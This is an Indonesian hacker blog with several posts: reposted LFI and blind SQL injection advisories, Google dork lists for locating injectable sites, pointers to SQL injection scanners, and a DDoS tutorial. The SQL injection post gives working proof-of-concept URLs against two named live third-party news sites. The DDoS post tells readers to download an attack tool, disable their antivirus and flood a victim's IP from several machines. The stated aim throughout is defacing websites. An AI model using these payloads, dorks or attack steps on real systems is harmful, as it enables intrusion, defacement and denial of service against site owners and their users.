L4zyB0i wasnt Here…lol

724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability

12 Mei 2010 at 10:16 (oprek)

——————————————————————————————-

724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability

——————————————————————————————-

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: 724CMS Enterprise Version 4.59

Download: http://724cms.com/

——————————————————————————————-

Exploit:

http://localhost/[path]/section.php?Module_Text=CoBRa_21&ID=6&Lang=En&Nav=Section&Module= [LFİ]

——————————————————————————————-

Thanks cyberlog

——————————————————————————————-

Permalink Tinggalkan sebuah Komentar

Joomla Custom PHP Pages Component LFI Vulnerability

12 Mei 2010 at 10:16 (oprek)

Joomla Custom PHP Pages Component LFI Vulnerability
=====================================================

- Discovered by : Chip D3 Bi0s
- Email : chipdebios@gmail.com
- Date : 2010-05-11
- Where : From Remote

———————————-
Affected software description

Application : Joomla Custom PHP Pages Component
Developer : Gabe
Email : gabe@fijiwebdesign.com
Type : Non-Commercial
License : GPL
Date Added : 6 June 2008
Download : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz

I. BACKGROUND

Joomla PHP Pages Component allows you to create simple PHP pages
and link them to the Joomla Menu. This allows you to easily create
a custom page without having to create a whole component. It is
similar to the PHP Module for Joomla, except that it is a full Component.

II. DESCRIPTION

Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component.

III. ANALYSIS

The bug is in the following files, specifying the lines

/components/com_php/php.php

[35] $filename = $Params->get(‘file’, ”);
[36] $path = JPATH_ROOT.’/components/com_php/files/’.$filename;
…
[47] // evaluate the PHP
[48] echo ‘

Permalink Tinggalkan sebuah Komentar

Dork RFI – rodo jadul tp lumayan nggo koleksi

14 Maret 2010 at 10:16 (oprek)

/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
/classified_right.php?language_dir=
/sources/functions.php?CONFIG[main_path]=
/sources/template.php?CONFIG[main_path]=
/embed/day.php?path=
/includes/dbal.php?eqdkp_root_path=
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
/includes/kb_constants.php?module_root_path=
/mcf.php?content=
/components/com_facileforms/facileforms.frame.php?ff_compath=
skins/advanced/advanced1.php?pluginpath[0]=
/zipndownload.php?PP_PATH=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=

/main.php?sayfa=
Baca entri selengkapnya »

Permalink Tinggalkan sebuah Komentar

Dork SQLi 2010

24 Januari 2010 at 10:16 (oprek)

monggo, gan!!! Dork anget2[ad yg basi jg....hehehee] buat praktek suntik SQL….

allinurl: \”index php go buy\”

allinurl: \”index.php?go=sell\”

allinurl: \”index php go linkdir\”

allinurl: \”index.php?go=resource_center\”

allinurl: \”resource_center.html\”

allinurl: \”index.php?go=properties\”

allinurl: \”index.php?go=register\”

inurl:trainers.php?id=

inurl:buy.php?category=

inurlallinurl: \”index php go buy\”

allinurl: \”index.php?go=sell\”

allinurl: \”index php go linkdir\”

allinurl: \”index.php?go=resource_center\”

allinurl: \”resource_center.html\”

allinurl: \”index.php?go=properties\”

allinurl: \”index.php?go=register\”

inurl:trainers.php?id=

inurl:buy.php?category=

inurllay_old.php?id=

inurl:declaration_more.php?decl_id=

inurlageid=

inurl:games.php?id=

inurlage.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

Baca entri selengkapnya »

Permalink Tinggalkan sebuah Komentar

Hispanic Digital Network Blind SQL Injection Vuln

24 Januari 2010 at 10:16 (oprek)

[o] Hispanic Digital Network Blind SQL Injection Vulnerability

Software : Hispanic Digital Network

Vendor   : http://www.hdnweb.com/

Author   : NoGe

Contact  : noge[dot]code[at]gmail[dot]com

Blog     : http://evilc0de.blogspot.com/

[o] Vulnerable file

news.php

[o] Exploit

http://localhost/[path]/news.php?nid=[Blind SQL]

[o] Proof of Concept

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 = false

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 = true

http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 = false

http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 = true

[o] Dork

“powered by Hispanic Digital Network”

[o] Notes

fucking private script again and all target are in one IP address. lol

Permalink Tinggalkan sebuah Komentar

Schemafuzz.py[SQLi Tools]

4 Januari 2010 at 10:16 (oprek)

Source:::v3n0m@YCL

Aplikasi yg dibutuhin:::
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD

Dg cmd masuk ke folder tempat schemafuzz.py berada…
Awali pertintah dengan format:
schemafuzz.py -u “url target” –perintah
List perintah ada dibawah…

Baca entri selengkapnya »

Permalink 2 Komentar

SQL Google Search Tool

4 Januari 2010 at 10:16 (oprek)

SQL – Google Search??
Tools ini gunanya buat nyari web2 yg bs kita suntik. Stelah sy liat skripnya, ada 4 vulnerable yg diuber2 ma tools ini, MySQL Injection, MS Access Injection, MSSQL Injection, & Oracle Injection. Lumayan buat tambah2 koleksi deface…
Baca entri selengkapnya »

Permalink 1 Komentar

SQL Injection

23 Desember 2009 at 10:16 (oprek)

Assalamoalaikom!!!

Wokehh, mumpung tugas2 kuliah dah pada cair, sy tulis tutor buat temen2 [khusus] sesama N3ubie yg pengen blajar deface website!!!
Apaan tuh deface??? Halah, golek dewe neng Google!!!![cari sendiri di Google!!!]

Apa aja yg dibutuhin??
1. Notepad/Wordpad/kertas ma bolpen!!!Brakwkwkwkwkwkwkwkwwk…..
2. http://home2.paulschou.net/tools/xlate/ >>>>> ntar gw kasi penjelasan kegunaan dr halaman tersebut…

Baca entri selengkapnya »

Permalink 2 Komentar

DDoS Attack!

27 Oktober 2009 at 10:16 (oprek)

Assalamoalaikom Wr. Wb.

Lama nggak pernah posting di blog ni gan!!! Materi kuliah kali ini DDoS(Denial Of Service) attack!!! Buat yg udah jago bobol web via DDoS, mending jgn baca deh… cos tutorial di bawah ini HANYA sbatas pengenalan aja!!! Wokehhh????

Monggo silakan dimakan ilmonya!!!

DDoS attack adalah Distributed-Denial-of-Service attack, sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system yang ‘menyerang’ secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-lamanya. DDoS attack adalah salah satu mrodel dari DoS ( denial-of-service) attack.

Target serangan DDoS bisa ditujukan ke berbagai bagian jaringan. Sperti server domain name system, routing devices, web, electronic mail, atau web.

Ada 5 tipe dasar Dos attack::::
1. Penggunaan berlebihan sumber daya komputer, sperti bandwith, diskspace, atau processor
2. Gangguan terhadap informasi konfigurasi, sperti informasi routing
3. Gangguan terhadap informasi status, misal memaksa me-reset TCP session
4. Gangguan terhadap komponen2 fisik network
5. Menghalang-halangi media komunikasi antara komputer dengan user sehingga mengganggu komunikasi

DOS attack jg termasuk eksekusi malware, yg dimaksudkan untuk:
# Memaksimalkan kerja processor, sehingga memblok tugas-tugas yg lain
# Memicu terjadinya error di dalam microcode
# Memicu error pada urutan instruksi dan memaksa komputer menjadi tidak stabil dan locked-up
# Memanfaatkan error2 yg ada di system operasi yg berbuntut pada ‘kmatian’ system
# Membuat system operasi menjadi crash
# iFrame (D)DoS, didalamnya terdapat sbuah dokumen HTML yg sengaja dibuat untuk mengunjungi halaman web ber-kilobyte tinggi dengan berulang-ulang, hingga melampaui batas bandwith

Gejala DDoS Attack:
# Kinerja jaringan menurun. Tidak sperti biasanya, membuka file atau mengakses situs menjadi lebih lambat
# Fitur2 tertentu pd sbuah web hilang
# Website sama sekali tidak bisa diakses
# Peningkatan jumlah email spam yang diterima sangat dramatis. Tipe DoS yang ini sering diistilahkan dengan “Mail Bomb”

Contoh kasus DoS attack::
# Februari 2007, lebih dari 10..000 server game online sperti Return to Castle Wolfenstein, Halo, CounterStrike, diserang oleh group hacker “RUS”. DDoS attack berasal dari 1.000 lebih komputer yg terletak di negara bekas UniSoviet. Kebanyakan berasal dari Rusia, Uzbekistan, dan Belarusia
# Juli 2008, banyaj blog milik blogger2 konservatif, termasuk Macsmind.com, merasa mendapat serangan DDoS hingga beberapa terpaksa harus offline. Serangan ini dikaitkan dengan 3 IP address yg diregister melalui GoDaddy.com ke barrackobama.com, situs resmi calon presiden AS dari Partai Demokrat, Barrack Obama.

Wokeh!!! Perkenalannya sampe situ aj, gan!!! Skarang kita masok ke sesi Tutorial…. Eat This!!

#Untuk melakukan serangan via DoS, kalian nggak harus punya koneksi internet yg ber-bandwith besar.

Donlod dolo softwarenya disne,

http://www.kitaupload.com/download.php?file=585dos%20web.zip

Beberapa antivirus sperti Avast, AVG, atau ESETnOd32 akan mendeteksi file tersebut adalah virus!!! Makanya disable dulu antivirusnya klo mau make’…(Klo saran saya, SEBAIKNYA JANGAN!!!!)

KLo dah donlo, tinggal bukak aja…. 

Masukin alamat ip korban pada kolom yg tertulis “localhost”, klo kalian nggak tau ip addressnya, klik menu “tools” pilih “URL to IP Converter”

Tinggal eksekusi tombol “Attack”

#Klo server target ‘terlalu kuat’, pake beberapa computer skaligus serta ubah “interval”nya jadi lbih kecil

Wokehh…Pengenalan & Tutorial diatas hanya sbatas ‘pengetahuan’!!! Slebihnya, Terserah ANDA!!!!

-L4zyB0i | Blakk.m00d.ON

Refference:JasakomDOTcom

Permalink 2 Komentar